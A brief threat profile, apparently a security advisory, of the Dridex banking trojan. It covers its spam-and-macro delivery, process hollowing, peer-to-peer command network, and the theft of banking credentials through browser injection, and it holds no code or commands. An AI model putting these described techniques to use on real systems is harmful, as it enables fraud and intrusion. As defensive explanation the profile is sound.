Dridex Banking Trojan

Based on the Zeus trojan, it was first observed in 2014 and has gone through several iterations to add further capabilities.

Dridex is primarily delivered via spam email containing malicious Microsoft Office documents (mainly Word, Excel and PowerPoint). When opened, these activate Visual Basic for Applications (VBA) macros that execute PowerShell scripts to connect to its command and control (C2) infrastructure, over HTTP, before downloading the Dridex binary. Other infection vectors have exploited Dynamic Data Exchange and Office Linking & Embedding vulnerabilities or used other malware, like Quant Loader as a dropper. Once delivered, Dridex uses process hollowing to run itself within an instance of svchost.exe or spoolsv.exe to avoid detection. Dridex also has the capability to propagate over network or removable drives.

C2 infrastructure is comprised of a network of compromised devices, all communicating with each other using the Peer-to-Peer (P2P) protocol. These nodes can be given elevated privileges within the network, dependant on machine build, up-time and data throughput, where they become responsible for co-coordinating the network. All communications between affected devices use a combination of RSA and RC4 encryption over HTTPS.

Once installed, Dridex will attempt to perform HTML injection attacks on web browser processes in order to monitor a user's communications. It will then look to steal financial information such as banking logins, card numbers or cryptocurrency wallet codes the user provides within that process. Dridex also has the following additional capabilities:

• Transfer and execute files.
• Bypass User Access Control to escalate privileges.
• Execute processes.
• Monitor network traffic.
• Take screenshots.
• Record keystrokes and mouse movements.
• Enrol the compromised device into the botnet.
• Communicate with other peer nodes using the P2P protocol to retrieve configuration details.
• Download and execute additional modules.